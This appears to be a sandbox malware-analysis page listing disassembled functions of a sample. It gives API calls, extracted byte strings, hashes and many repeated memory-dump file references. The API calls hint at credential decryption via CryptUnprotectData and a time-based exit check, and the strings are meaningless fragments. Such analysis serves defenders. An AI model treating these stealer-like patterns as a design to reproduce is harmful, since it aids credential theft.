Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 5A}$CNn#$_z1$xc? $bk6
API String ID: 0-3462840589
Opcode ID: b657a82868f7bd3070fe63b91703fff83b4d652bd48805dd05e389acc0c6d88f
Instruction ID: 5f744d94b1aaf639cfae3f3d28a0bc2af07bd28af8ded48d71b4d2f7bb7324de
Opcode Fuzzy Hash: b657a82868f7bd3070fe63b91703fff83b4d652bd48805dd05e389acc0c6d88f
Instruction Fuzzy Hash: AFA2E4F39082009FE7046F29EC8567ABBE9EF94720F1A493DEAC4C3344E63598558797

Function 006A6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 006A696C
sscanf.NTDLL ref: 006A6999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006A69B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006A69C0
ExitProcess.KERNEL32 ref: 006A69DA

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 84666b3225606d78b5d4df07f81fdecead05c56250d1d7d2ffa772dca24b76f5
Instruction ID: cf5eabca63612cf05bbabdfc4d92d67be60dbca19001e8de0b4efa4cfbceae10
Opcode Fuzzy Hash: 84666b3225606d78b5d4df07f81fdecead05c56250d1d7d2ffa772dca24b76f5
Instruction Fuzzy Hash: 9021EB75D10209ABCF48EFE4D945AEEB7BABF48300F14852EE416E3250EB345604CB69

Function 00697240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0069724D
RtlAllocateHeap.NTDLL(00000000), ref: 00697254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00697281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006972A4
LocalFree.KERNEL32(?), ref: 006972AE

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: b009488dfe245241148f2cad0dae15033c64fb3720faa229bf58a6cc494ad58c
Instruction ID: ee03cf993f0893fe12efa29fa47c252e88b2cd44775738241044dc41d2fcbe9b
Opcode Fuzzy Hash: b009488dfe245241148f2cad0dae15033c64fb3720faa229bf58a6cc494ad58c
Instruction Fuzzy Hash: 1A014CB1A41208BBEB14DFD4CD4AF9E7BB8BB44B00F204155FB05AA2C0D6B0AA008B65

Function 00A5E78B Relevance: 7.3, Strings: 5, Instructions: 1017COMMON

Download Yara Rule

Strings

X7k{, xrefs: 00A5EA36
;?~m, xrefs: 00A5EAF3
!?, xrefs: 00A5EF1E
!SeW, xrefs: 00A5E8B4
5'oo, xrefs: 00A5F30B

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !SeW$!?$5'oo$;?~m$X7k{
API String ID: 0-3771672524
Opcode ID: c8d7286d923506a9ef197b84ff5af47354c86e62df3a3dae7da4b31a550c7172
Instruction ID: ceed6b0442e164c78012c733db099857f6d00d2d76bb5e61ac1460293293d34a
Opcode Fuzzy Hash: c8d7286d923506a9ef197b84ff5af47354c86e62df3a3dae7da4b31a550c7172
Instruction Fuzzy Hash: FF6204F3A0C6009FE304AF29EC8567ABBE5EF84720F16893DEAC487704E67558418797

Function 00A591AC Relevance: 6.4, Strings: 4, Instructions: 1425COMMON

Download Yara Rule

Strings

S4, xrefs: 00A593BE
c'Z, xrefs: 00A598E8
j$wo, xrefs: 00A59465
2hu, xrefs: 00A594DC

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 2hu$S4$c'Z$j$wo
API String ID: 0-1740423047
Opcode ID: 2efed3cf0c6ab4d1c7f9f0803afb4e97a06f749977329cfb6c70c1e12ee63f71
Instruction ID: 3b227c76cf54abbff95257d1fa3d2bc6224ef43231e708e277069af6c957649c
Opcode Fuzzy Hash: 2efed3cf0c6ab4d1c7f9f0803afb4e97a06f749977329cfb6c70c1e12ee63f71
Instruction Fuzzy Hash: A3A2F4F3A0C2049FE304AE2DDC8567ABBE9EF94320F16893DE6C5C7344E63598458796

Function 006A8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00695184,40000001,00000000,00000000,?,00695184), ref: 006A8EC0

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 347c9b48104dbe56207917fd6b194cc6c4e2c5f77a34897c44d1068f3b4d7d21
Instruction ID: 9a439d2c5484e90a78306417e0ff991dcd008350426b39ee2cc5c4f17519628f
Opcode Fuzzy Hash: 347c9b48104dbe56207917fd6b194cc6c4e2c5f77a34897c44d1068f3b4d7d21
Instruction Fuzzy Hash: 69110670200209EFDB04EF64E884FAB37AABF8A340F109558F9198B250DB35EC41DF60

Function 00A6EA9A Relevance: 5.4, Strings: 3, Instructions: 1678COMMON

Download Yara Rule

Strings

bg?F, xrefs: 00A6F233
z(m], xrefs: 00A6F1D6
C:], xrefs: 00A6F1EC

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: C:]$bg?F$z(m]
API String ID: 0-1789177252
Opcode ID: 0d7f890c96fd198b9d8258db02efc7525482fac1b57ed3a22162fb770dfc1a95
Instruction ID: 4ff1f3667c5f4e804642d1474c54698394b8f7a69d9bbf054949b1e91efc8aec
Opcode Fuzzy Hash: 0d7f890c96fd198b9d8258db02efc7525482fac1b57ed3a22162fb770dfc1a95
Instruction Fuzzy Hash: 77B217F360C2049FE3046E2DEC8577AFBE9EB94320F164A3DE6C4C7744EA7598058696

Function 00A680B3 Relevance: 5.4, Strings: 3, Instructions: 1633COMMON

Download Yara Rule

Strings

%*6}, xrefs: 00A68497
+;;u, xrefs: 00A69152
2kqW, xrefs: 00A681C6

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %*6}$+;;u$2kqW
API String ID: 0-1493910107
Opcode ID: 2d51bbc4898d1e7cbdecf150d7258c75c9e9b99e1aa40064d4322e8cd7d66bdc
Instruction ID: df79dd3f656d080f170d507911ecee6a05f4a9f4cd5dadc81fd428955abe5fd0
Opcode Fuzzy Hash: 2d51bbc4898d1e7cbdecf150d7258c75c9e9b99e1aa40064d4322e8cd7d66bdc
Instruction Fuzzy Hash: 1AB207F3A0C2049FE3046E2DEC8567ABBE9EF94320F16893DEAC5C7744E63558058697

Function 00A64B80 Relevance: 5.3, Strings: 3, Instructions: 1578COMMON

Download Yara Rule

Strings

)tO, xrefs: 00A65D3F
El~, xrefs: 00A65D6F
wNDy, xrefs: 00A64DA2

Memory Dump Source

Source File: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
